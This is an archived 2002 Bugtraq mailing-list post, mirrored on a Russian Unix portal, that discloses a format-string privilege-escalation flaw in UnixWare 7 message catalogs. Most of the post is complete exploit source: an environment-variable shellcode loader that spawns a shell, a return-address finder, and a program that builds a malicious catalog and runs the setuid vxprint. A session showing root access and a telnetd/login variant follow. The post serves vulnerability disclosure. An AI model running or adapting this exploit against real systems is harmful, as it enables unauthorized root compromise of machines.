The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version
Search
Выпущена CD-версия OpenNet.RU для оффлайн просмотра.
Для формирования заказа - перейдите по ссылке.
SOFT - Unix Software catalog
LINKS - Unix resources		 TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

Unixware Message catalog exploit code


<< Previous INDEX Search src Set bookmark Go to bookmark Next >> 
Date: 10 Feb 2002 03:27:05 -0000
From: "jGgM." <jggm@mail.com>
To: bugtraq@securityfocus.com
Subject: Unixware Message catalog exploit code



Hi, I'm jGgM.

I was reported this problem Caldera, a few week ago.
And, This exploit is fixed already.

Hacker can modify message catalog and,
It can possible format string exploit.

for example)

$ gcc -o expshell expshell.c
$ gcc -o getret getret.c
$ gcc -o fmt_exp fmt_exp.c
$ ./expshell
$ ./getret
e=8047af7
$ ./fmt_exp 0x8047af7  16 ( 16 is offset )
...........(wait 30 minutes ). ......

# id
uid=0(root) gid=3(sys) ......................

This can exploit all of unixware 7 setuid/setgid 
command.

Also, can exploit telnetd and login.

example)
$ telnet
telnet> env def LC_MESSAGES /tmp
telnet> o localhost
Trying....
.....
login: blah blah..
password: blah.. blash..
...... (wait 30 minutes.. )
# 

------------------------------------------------
Korean security forum
http://www.forsecure.com
http://www.netemperor.com
------------------------------------------------

Here is code.

------------------ expshell.c ------------------
#include <stdio.h>

char shellcode[]=
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xeb\x1a"             /* jmp     <shellcode+28>         */
    "\x33\xd2"             /* xorl    %edx,%edx              */
    "\x58"                 /* popl    %eax                   */
    "\x8d\x78\x14"         /* leal    0x14(%eax),%edi        */
    "\x57"                 /* pushl   %edi                   */
    "\x50"                 /* pushl   %eax                   */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x92"                 /* xchgl   %eax,%edx              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x88\x42\x08"         /* movb    %al,0x8(%edx)          
*/
    "\x83\xef\x3b"         /* subl    $0x3b,%edi             */
    "\xb0\x9a"             /* movb    $0x9a,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\x47"                 /* incl    %edi                   */
    "\xb0\x07"             /* movb    $0x07,%al              */
    "\xab"                 /* stosl   %eax,%es:(%edi)        */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xe8\xe1\xff\xff\xff" /* call    <shellcode+2>          */
    "/bin/ksh"
;

main(int argc, char *argv[])
{
   char buff[1024];

   sprintf(buff, "EGG=%s", shellcode);
   putenv(buff);

   putenv("LC_MESSAGES=/tmp");
   system("/usr/bin/tcsh");
}
---------------------------------------------------------------

---------------- getret.c --------------------
main()
 {
 char *a;
 a = getenv("EGG");
 printf ("e=%p\n", a);
 }
-----------------------------------------------

---------------- fmt_exp.c -----------------------------
#include <stdio.h>
#include "shellcode.h"

/* This is base of format string return address */
/* Base address of vxprint is 0x20c7c(134268) */
#define BASE 134268

main(int argc, char *argv[])
{
   FILE *fp;
   char *retaddr;
   long g_len, offset;
   int count, count2, line=700, n=19;

   if(argc < 2 || argc > 3) {
      printf("Usage: %s ret-address offset\n", argv[0]);
      exit(1);
   }

   retaddr = argv[1];
   if(argc == 3) offset = atol(argv[2]);
   else offset = 0;

   g_len = strtol(retaddr, NULL, 16);
   g_len -= BASE;
   g_len += offset;

   fp = fopen("testdef", "w+");
   if(fp == NULL) {
      fprintf(stderr, "can not open file.\n"); exit(1);
   }
   for(count=0; count<line; count++) {
      for(count2=0; count2<n; count2++)
         fprintf(fp, "%%10x");
      fprintf(fp, "%%%dx%%n\n", g_len);
   }
   fclose(fp);

   remove("testout");
   system("mkmsgs testdef testout");
   mkdir("/tmp/LC_MESSAGES", 0755);
   system("mv 
testout /tmp/LC_MESSAGES/vxvm.mesg");

   printf("ret addr = 0x%x\n", g_len);
   /* this, also can any set uid command */
   execl("/usr/sbin/vxprint", "vxprint", "---", NULL);
}
---------------------------------------------------------------

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки 		Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList